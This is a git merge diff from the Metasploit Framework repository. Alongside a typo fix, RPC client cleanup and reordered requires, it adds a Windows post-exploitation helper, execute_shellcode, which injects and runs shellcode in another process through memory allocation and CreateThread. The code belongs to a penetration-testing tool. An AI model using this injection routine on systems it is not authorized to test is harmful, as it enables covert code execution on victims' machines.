Merge branch 'master' of https://github.com/rapid7/metasploit-framework

2013-06-29 16:24:45 -05:00 · 2013-06-29 16:24:45 -05:00 · 6e7945ca5e
parent 81a2d9d1d5 c07254afb0
commit 6e7945ca5e
4 changed files with 52 additions and 5 deletions
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@ -9,7 +9,7 @@ module Msf
 #
 # This code was stolen straight out of the psexec module. Thanks very
 # much for all who contributed to that module!! Instead of uploading
-# and runing a binary.
+# and running a binary.
 ####

 module Exploit::Remote::SMB::Psexec
--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@ -0,0 +1,40 @@
+# -*- coding: binary -*-
+
+module Msf
+class Post
+module Windows
+
+module Process
+
+	#
+	# Injects shellcode to a process, and executes it.
+	#
+	# @param shellcode [String] The shellcode to execute
+	# @param base_addr [Fixnum] The base address to allocate memory
+	# @param pid       [Fixnum] The process ID to inject to
+	#
+	# @return [Boolean] True if successful, otherwise false
+	#
+	def execute_shellcode(shellcode, base_addr, pid=nil)
+		pid ||= session.sys.process.getpid
+		host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+		shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
+		if host.memory.write(shell_addr, shellcode) < shellcode.length
+			vprint_error("Failed to write shellcode")
+			return false
+		end
+
+		vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
+		ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)
+		if ret['return'] < 1
+			vprint_error("Unable to CreateThread")
+			return false
+		end
+
+		true
+	end
+
+end # Process
+end # Windows
+end # Post
+end # Msf
--- a/lib/msf/core/rpc/v10/client.rb
+++ b/lib/msf/core/rpc/v10/client.rb
@ -12,7 +12,7 @@ module RPC

 class Client

-	attr_accessor :sock, :token, :info
+	attr_accessor :token, :info


 	def initialize(info={})
@ -67,6 +67,7 @@ class Client
 		)

 		res = @cli.send_recv(req)
+		@cli.close

 		if res and [200, 401, 403, 500].include?(res.code)
 			resp = MessagePack.unpack(res.body)
@ -82,8 +83,10 @@ class Client
 	end

 	def close
-		self.sock.close rescue nil
-		self.sock = nil
+		if @cli and @cli.conn?
+			@cli.close
+		end
+		@cli = nil
 	end

 end
--- a/modules/post/windows/manage/pptp_tunnel.rb
+++ b/modules/post/windows/manage/pptp_tunnel.rb
@ -5,11 +5,15 @@
 # http://metasploit.com/framework/
 ##

+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+
 class Metasploit3 < Msf::Post

-	include Msf::Post::Windows::Priv
 	include Msf::Post::Common
 	include Msf::Post::File
+	include Msf::Post::Windows::Priv
 	include Msf::Post::Windows::Registry

 	def initialize(info={})